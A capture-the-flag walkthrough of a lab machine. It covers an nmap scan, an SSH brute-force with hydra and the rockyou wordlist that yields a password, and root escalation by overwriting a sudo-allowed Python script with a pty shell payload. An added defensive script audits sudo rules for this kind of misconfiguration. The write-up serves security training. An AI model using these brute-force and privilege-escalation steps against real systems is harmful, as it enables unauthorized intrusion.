Library
1. Reconnaissance and Enumeration
1.1. Initial Port Scan
export TARGET_IP=10.10.37.96 # Set the target IP as an environment variable for convenience.
nmap -p- --min-rate 5000 $TARGET_IP
Results:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1.2. Web Enumeration
We further investigate the web server running on port 80.
- Direct Access: Browsing to http://10.10.37.96/ reveals a blog post authored by "meliodas". This is a potential username for later use.
- robots.txt Analysis: Examining http://10.10.37.96/robots.txt reveals the following:
User-agent: rockyou
Interpretation: This is a strong hint. It implies that we should use the rockyou.txt wordlist, likely against the SSH service, given the potential username "meliodas".
2. Exploitation: SSH Brute-Force
hydra -V -l "meliodas" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f
Results:
[22][ssh] host: 10.10.37.96 login: meliodas password: iloveyou1
Success: hydra successfully identifies the password "iloveyou1" for the user "meliodas".
3. Privilege Escalation
3.1. Initial Shell and Enumeration
We log in to the target machine using the discovered credentials:
ssh meliodas@10.10.37.96 # Password: iloveyou1
Once logged in, we perform basic system enumeration:
id
Output:
uid=1000(meliodas) gid=1000(meliodas) groups=1000(meliodas),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
sudo -l
Output:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
sudo -l: Lists the commands that "meliodas" can run with sudo (superuser privileges). Crucially, the output shows that "meliodas" can execute /usr/bin/python* /home/meliodas/bak.py as root without a password (NOPASSWD). This is a significant misconfiguration and our path to privilege escalation: the script lives in the user's own home directory, so the user can rewrite its contents, and the wildcard in /usr/bin/python* matches any installed Python interpreter rather than one pinned binary.
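As an added defensive check (not part of the original writeup), the following script parses sudo -l output and flags rules of the kind found here: an interpreter invoked with a script argument that the invoking user controls, a wildcard in the command path, and NOPASSWD. The sample output, the INTERPRETERS list and the user_controlled heuristic are constructed assumptions.

```python
import os
import re

# Interpreters whose first argument is a script executed with the rule's privileges (assumed list).
INTERPRETERS = {"python", "perl", "ruby", "bash", "sh", "node"}
# One rule line of 'sudo -l' output, e.g. "(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py".
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

def user_controlled(path, user_home):
    """Heuristic: the path lives in the user's home directory or is writable by the current user."""
    return path.startswith(user_home.rstrip("/") + "/") or os.access(path, os.W_OK)

def audit_rule(rule, user_home, is_controlled=user_controlled):
    """Return the reasons one sudo rule is dangerous (empty list if nothing was found)."""
    m = RULE_RE.match(rule.strip())
    if not m:
        return []
    argv, runas = m.group("cmd").split(), m.group("runas")
    reasons = []
    if "*" in argv[0]:
        reasons.append(f"wildcard in command path {argv[0]} matches any similarly named binary")
    # Normalise '/usr/bin/python3.8*' -> 'python' before matching against INTERPRETERS.
    exe = os.path.basename(argv[0]).rstrip("*0123456789.")
    if exe in INTERPRETERS:
        for arg in argv[1:]:
            if arg.startswith("/") and is_controlled(arg, user_home):
                reasons.append(f"script {arg} is user-controlled and runs as {runas}")
    if reasons and "NOPASSWD" in m.group("tags"):
        reasons.append("NOPASSWD: no password is required, so the rule is usable from any session")
    return reasons

def audit_sudo_output(text, user_home, is_controlled=user_controlled):
    """Audit every rule line in 'sudo -l' output; returns {rule: [reasons]} for flagged rules."""
    findings = {}
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("(") and (reasons := audit_rule(line, user_home, is_controlled)):
            findings[line] = reasons
    return findings

# Constructed sample of 'sudo -l' output, modelled on the rule found on the target.
SAMPLE_SUDO_L = """\
User meliodas may run the following commands on library:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
    (ALL) /usr/bin/systemctl restart nginx
"""

if __name__ == "__main__":
    for rule, reasons in audit_sudo_output(SAMPLE_SUDO_L, "/home/meliodas").items():
        print(rule, *("  - " + r for r in reasons), sep="\n")
```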
3.2. Exploiting the Python Script
We examine the bak.py script:
cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    # Walk the directory tree and add every file to the open ZipFile handle.
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    # Back up the web root into /var/backups/website.zip (run as root via sudo).
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
3.3. Gaining Root Access
We replace the bak.py script with a simple command to spawn a root shell:
rm /home/meliodas/bak.py
echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py
Explanation of Payload:
- import pty: Imports the pty module, which is used to create pseudo-terminals. This is a more reliable way to get a shell than simply using os.system.
- pty.spawn("/bin/sh"): Spawns a new shell (/bin/sh) within a pseudo-terminal.
Now, we execute the modified script using sudo:
sudo /usr/bin/python /home/meliodas/bak.py
id
Output:
uid=0(root) gid=0(root) groups=0(root)
Success! We have obtained a root shell. The id command confirms that we are now running as the root user (UID 0).